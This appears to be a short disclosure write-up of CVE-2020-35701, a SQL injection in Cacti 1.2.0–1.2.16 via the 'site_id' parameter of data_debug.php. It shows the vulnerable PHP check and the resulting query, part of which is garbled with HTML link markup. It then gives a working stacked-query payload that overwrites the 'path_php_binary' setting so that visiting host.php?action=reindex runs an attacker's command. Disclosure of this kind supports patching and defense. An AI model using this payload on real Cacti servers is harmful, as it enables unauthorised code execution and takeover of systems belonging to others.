CVE-2020-35701 – Cacti 1.2.0 – 1.2.16 SQL Injection

This one is pretty straightforward and was found pretty quick

An SQL injection in the latest version of cacti.

In order to trigger the vulnerability you just need to enter this url: cacti/data_debug.php?action=ajax_hosts&site_id=11SQLInjection

Because of how PHP behaves, the check:

if (get_request_var('site_id') > 0) {
   $sql_where = 'site_id = ' . get_request_var('site_id');
}

will pass when the parameter starts with a number, and in the end the system will try to execute the following query:

SELECT h1.*
FROM host AS h1
         INNER JOIN (SELECT DISTINCT id
                     FROM (SELECT h.*, uap0.user_id AS user0, uap1.user_id AS user1, uap2.user_id AS user2
                           FROM host AS h
                                    LEFT JOIN graph_local AS gl ON h.id = gl.host_id
                                    LEFT JOIN graph_templates_graph AS gtg ON gl.id = gtg.local_graph_id
                                    LEFT JOIN graph_templates AS gt ON gt.id = gl.graph_template_id
                                    LEFT JOIN host_template AS ht ON h.host_template_id = ht.id
                                    LEFT JOIN user_auth_perms AS uap0
                                              ON (gl.id = uap0.item_id AND uap0.type = 1 AND uap0.user_id = 1)
                                    LEFT JOIN user_auth_perms AS uap1
                                              ON (gl.host_id = uap1.item_id AND uap1.type = 3 AND uap1.user_id = 1)
                                    LEFT JOIN user_auth_perms AS uap2
                                              ON (gl.graph_template_id = uap2.item_id AND uap2.type = 4 AND
                                                  uap2.user_id = 1)
                           WHERE site_id = <strong>11sql_injection</strong>) AS rs1) AS rs2 ON rs2.id = h1.id;
select 1 # AND hostname LIKE '%hostname%' OR description LIKE '%description%' OR notes LIKE '%notes%' AND h.disabled=""
HAVING (user0 IS NULL OR (user1 IS NULL OR user2 IS NULL)) ) AS rs1 ) AS rs2
ON <a rel="noreferrer noopener" href="http://rs2.id/" target="_blank">rs2.id</a>=<a rel="noreferrer noopener" href="http://h1.id/" target="_blank">h1.id</a>
ORDER BY description LIMIT 30

If we will execute something like this:

cacti/data_debug.php?action=ajax_hosts&amp;site_id=11) AS rs1   ) AS rs2   ON rs2.id=h1.id;update settings set value='php -r "file_put_contents(\'/tmp/a\',\'aaa\'); "' where name='path_php_binary';-- -


We will manage to execute code when we will visit /cacti/host.php?action=reindex